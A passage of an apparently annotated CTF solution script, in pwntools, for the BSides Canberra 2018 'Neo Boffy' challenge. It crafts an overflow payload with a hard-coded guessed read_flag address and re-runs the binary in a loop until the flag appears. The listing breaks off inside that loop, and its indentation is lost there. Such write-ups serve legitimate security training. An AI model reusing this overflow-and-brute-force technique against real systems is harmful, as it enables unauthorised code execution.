Solution to Neo Boffy from the BSides Canberra CTF 2018
from pwn import *
# Relative path to the challenge binary, so the script has to be started from
# the directory that holds it.
bin_path = "./neo_boffy"
# Don't want pwntools writing to the console every time we spawn a binary, since we are spawning a lot of binaries
# NOTE(review): no statement that lowers pwntools' log level follows in this
# listing, so process() presumably still logs every spawn - confirm against
# the full script.
# A single command-line argument cannot contain a NUL, but an argument may be
# the empty string, so the data is cut at every NUL and passed as several
# arguments.
def cmdify(str):
    """Split *str* at each NUL character and return the resulting list.

    Consecutive NULs yield empty strings in the list. The caller appends
    the list to the binary path to form the argv given to process().
    """
    # The parameter shadows the builtin ``str``; the name is kept because it
    # is part of the function's interface.
    separator = "\x00"
    pieces = str.split(separator)
    return pieces
# Presumably the offset of the read_flag routine inside the binary image;
# the value is given by the author and not derived in this script.
read_flag_offset = 0x8d0
# Absolute address = guessed load base + offset. The base is a fixed guess
# because nothing leaks the real one; the retry loop further down re-runs the
# binary until a run prints the flag.
# NOTE(review): presumably the binary is a 32-bit PIE and the guess only lines
# up on some runs - confirm against the binary and the host's ASLR settings.
read_flag = 0x565ee000 + read_flag_offset # Hard code since there is no aslr leak
loop_cap = 0x78 # This is where the loop caps
# The significant bytes are built first and then left-padded to full length.
payload = ""
payload += "\x00" * 3 # ensure we can keep looping
# p32() packs the address into 4 bytes (little-endian under pwntools' default
# context).
# NOTE(review): appending its result to a str only works where p32() returns
# str (Python 2); under Python 3 pwntools returns bytes and this line raises
# TypeError.
payload += p32(read_flag)
# One character whose value depends on the length built so far: with 3 NULs
# and 4 address bytes len(payload) is 7, so this appends chr(0x78 - 1 - 7),
# i.e. chr(0x70). Statement order matters here.
payload += chr(loop_cap - 1 - len(payload))
# Left-pad with "A" to 0x79 characters so the 8 characters built above end up
# at the very end of the string.
payload = payload.rjust(0x79, "A")
# Keep trying until we find it
while True:
p = process([bin_path] + cmdify(payload))
out = p.recvall()
if "CTF{" in out: